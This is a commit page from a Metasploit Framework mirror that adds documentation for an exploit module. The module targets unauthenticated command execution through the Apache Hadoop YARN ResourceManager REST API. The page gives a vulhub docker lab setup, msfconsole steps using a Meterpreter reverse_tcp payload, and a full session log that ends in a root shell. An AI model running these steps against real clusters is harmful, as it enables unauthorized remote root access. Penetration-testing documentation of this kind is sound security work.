infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add doc for this module

GSoC/Meterpreter_Web_Console
Green-m 2018-05-15 03:47:09 -04:00
parent a7817564ea
commit c5bdd2ca9d
1 changed files with 112 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

112
documentation/modules/exploit/linux/http/hadoop_unauth_exec.md Normal file
View File

@ -0,0 +1,112 @@
## Description
This module exploits an unauthorized command execution vulneralbility in Apache Hadoop through ResourceManager REST API.
## Vulnerable Application
**Vulnerable Application Link**
- docker
https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
## Vulnerable Application Installation Setup.
Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up -d`
## Verification Steps
Example steps in this format (is also in the PR):
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/linux/http/hadoop_unauth_exec```
4. Do: ``set rhost x.x.x.x``
5. Do: ``set rport 8088``
6. Do: ``check``
``[+] 192.168.77.141:8088 The target is vulnerable.``
7. Do: `set payload linux/x86/meterpreter/reverse_tcp`
8. Do: ``exploit``
9. You should get a shell.
## Scenarios
```
msf5 > use exploit/linux/http/hadoop_unauth_exec
msf5 exploit(linux/http/hadoop_unauth_exec) > show options
Module options (exploit/linux/http/hadoop_unauth_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 8088 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141
rhost => 192.168.77.141
msf5 exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/http/hadoop_unauth_exec) > show options
Module options (exploit/linux/http/hadoop_unauth_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.77.141 yes The target address
RPORT 8088 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141
lhost => 192.168.77.141
msf5 exploit(linux/http/hadoop_unauth_exec) > exploit
[*] Started reverse TCP handler on 192.168.77.141:4444
[*] Sending Command
[*] Command Stager progress - 100.00% done (763/763 bytes)
[*] Sending stage (853256 bytes) to 172.20.0.3
[*] Meterpreter session 1 opened (192.168.77.141:4444 -> 172.20.0.3:34138) at 2018-05-15 03:21:17 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```